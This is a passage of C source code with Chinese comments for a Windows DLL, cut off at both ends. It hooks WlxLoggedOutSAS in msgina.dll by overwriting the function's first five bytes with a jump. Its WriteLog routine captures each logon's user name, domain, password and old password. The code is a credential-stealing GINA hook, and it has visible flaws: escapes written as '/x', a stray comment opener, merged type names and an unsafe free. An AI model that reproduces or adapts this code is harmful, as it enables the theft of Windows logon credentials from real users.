|
ol isWin2K()//判断操作系统版本
{
DWORD winVer;
OSVERSIONINFO *osvi;
winVer=GetVersion();
if(winVer<0x80000000)
{
osvi= (OSVERSIONINFO *)malloc(sizeof(OSVERSIONINFO));
if (osvi!=NULL)
{
memset(osvi,0,sizeof(OSVERSIONINFO));
osvi->dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
GetVersionEx(osvi);
if(osvi->dwMajorVersion==5L&&osvi->dwMinorVersion==0L)
{
free(osvi);
return true;
}
}
}
free(osvi);
return false;
}
#pragma pack(1)//对齐字节
struct HookTable{
HMODULEhMsgina;
WlxLoggedOutSAS OldDDR;
WlxLoggedOutSAS NewADDR;
unsigned charOldCode[6];
unsigned charJmpCode[6];
};//自定义的结构体
HookTable hooktable = {
0 ,
0 ,
&FunNewADDR ,
"/x8B/xFF/x55/x8B/xEC", //前5个字节
"/xE9/x00/x00/x00/x00" //e9 ,jmp
};
/*
#pragma pack()
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
if(isWin2K())
//win2K和xp、2003的前五个字节不同
{
hooktable.OldCode[0] ='/x55';
hooktable.OldCode[1] ='/x8B';
hooktable.OldCode[2] ='/xEC';
hooktable.OldCode[3] ='/x83';
hooktable.OldCode[4] ='/xEC';
}
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
HANDLE hthread = CreateThread( 0 ,
0 ,
LPTHREAD_START_ROUTINE(StartHook) ,
0 ,
0 ,
0);
CloseHandle( hthread );
break;
}
return TRUE;
}
DWORD WINAPI StartHook(LPVOID lpParameter)
{
hooktable.hMsgina = GetModuleHandle( _T("msgina.dll"));
if ( hooktable.hMsgina == NULL)
{
return 0 ;
}
hooktable.OldDDR = (WlxLoggedOutSAS)GetProcAddress( hooktable.hMsgina , _T("WlxLoggedOutSAS") );
//得到原始函数地址,等下撤销HOOK会用到
if (hooktable.OldDDR == NULL)
{
return 0 ;
}
unsigned char *p = (unsigned char *)hooktable.OldDDR;
int *OpCode = (int *)&hooktable.JmpCode[1];//
int Code = (int)hooktable.NewADDR - (int)hooktable.OldDDR - 5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
void HookWlxLoggedOutSAS()
{
DWORD OldProtect = NULL;
VirtualProtect( hooktable.OldDDR ,
5 ,
PAGE_EXECUTE_READWRITE ,
&OldProtect
);//内存访问权限
unsigned char *p = (unsigned char *)hooktable.OldDDR;
for (int i=0 ; i < 5 ; i++ )
{
p[i] = hooktable.JmpCode[i];
}
VirtualProtect( hooktable.OldDDR ,
5 ,
OldProtect ,
&OldProtect
);
return;
}
void UnHookWlxLoggedOutSAS()
{
DWORD OldProtect = NULL;
VirtualProtect( hooktable.OldDDR ,
5 ,
PAGE_EXECUTE_READWRITE ,
&OldProtect );
unsigned char *p = (unsigned char *)hooktable.OldDDR;
for (int i=0 ; i < 5 ; i++ )
{
p[i] = hooktable.OldCode[i];
}
VirtualProtect( hooktable.OldDDR ,
5 ,
OldProtect ,
&OldProtect );
return;
}
char pBuffer[1124];
void WriteLog(PWLX_MPR_NOTIFY_INFOpNprNotifyInfo)
//主要是一些文件操作
{
int size_u = lstrlenW( pNprNotifyInfo->pszUserName );
size_u += lstrlenW( pNprNotifyInfo->pszDomain );
size_u += lstrlenW( pNprNotifyInfo->pszPassword );
size_u += lstrlenW( pNprNotifyInfo->pszOldPassword );
unsigned short *pWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
unsigned short *tWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
char pBuffer1[1124];
char *pwd =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
char *pwd2 =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024*3 );
ZeroMemory( pWBuffer , size_u + 1024 );
ZeroMemory( pBuffer , size_u + 1024 );
ZeroMemory( pBuffer1 , size_u + 1024 );
if ( !pBuffer )
{
return;
}else
{
WriteCurrentTime();
wsprintfW( pWBuffer ,
L"/r/nUser= %s /r/nDomain = %s |